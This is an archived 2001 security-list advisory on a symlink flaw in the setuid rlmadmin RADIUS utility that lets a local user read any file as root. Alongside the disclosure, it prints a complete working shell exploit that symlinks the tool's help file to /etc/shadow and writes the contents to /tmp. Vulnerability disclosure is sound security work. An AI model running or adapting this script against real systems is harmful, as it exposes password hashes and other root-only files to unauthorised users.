OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Digital Shadow (wodahsgmx.net)
Date: Fri Sep 07 2001 - 04:32:46 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
    [Ministry-Of-Peace] - Security Advisory #01 - 07th Sept 2001
    rlmadmin v3.8M view file symlink vulnerability
    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

    Overview:
    ---------
     rlmadmin is a user management utility for RADIUS which comes with the
     Merit AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/).
     Using this program and a simple symlink, you can view any file on the
     system as root.

    Description:
    ------------
     Using the -d option of rlmadmin allows you to specify the directory
     in which it will look for its configuration files.

     The files that it looks for in this directory during startup are:
       dictionary - dictionary translations for parsing requests and
                         generating responses.
       rlmadmin.help - the help file that is displayed on startup.
       vendors - vendor specific information.

     The problem occurs when rlmadmin reads from the "rlmadmin.help" file.
     If this file is symlinked to another file (such as /etc/shadow), the
     program blindly follows the link, causing the contents of the file to
     be displayed when the program starts up.

    Versions Affected:
    ------------------
     rlmadmin v3.8M (and earlier?)
     rlmadmin v5.01 Commercial (available from www.interlinknetworks.com -
                                this version isn't setuid root by default,
                                but is still affected if set by the admin)

    Exploit Code:
    -------------
    #!/bin/sh
    # -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
    # rlmadmin view file symlink vulnerability #
    # (c)oded 2001 Digital Shadow #
    # www.ministryofpeace.co.uk #
    # -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
    bloc=/usr/private/etc # executable file location
    cloc=/usr/private/etc/raddb # config file location
    file=/etc/shadow # file to read
    echo == rlmadmin exploit - visit \
    www.ministryofpeace.co.uk for more!
    echo = Initialising...
    mkdir /tmp/peace; cd /tmp/peace
    cp $cloc/dictionary $cloc/vendors .
    ln -s $file rlmadmin.help
    echo = Exploiting...
    echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
    mv peace.log /tmp; rm dictionary rlmadmin.help vendors
    echo = Done!
    echo == Now look in /tmp/peace.log!

    Credits:
    --------
    Vulnerability discovered by Digital Shadow.

    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
     advisories[at]ministryofpeace.co.uk -- www.ministryofpeace.co.uk
    -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --

    -- 
    Sent through GMX FreeMail - http://www.gmx.net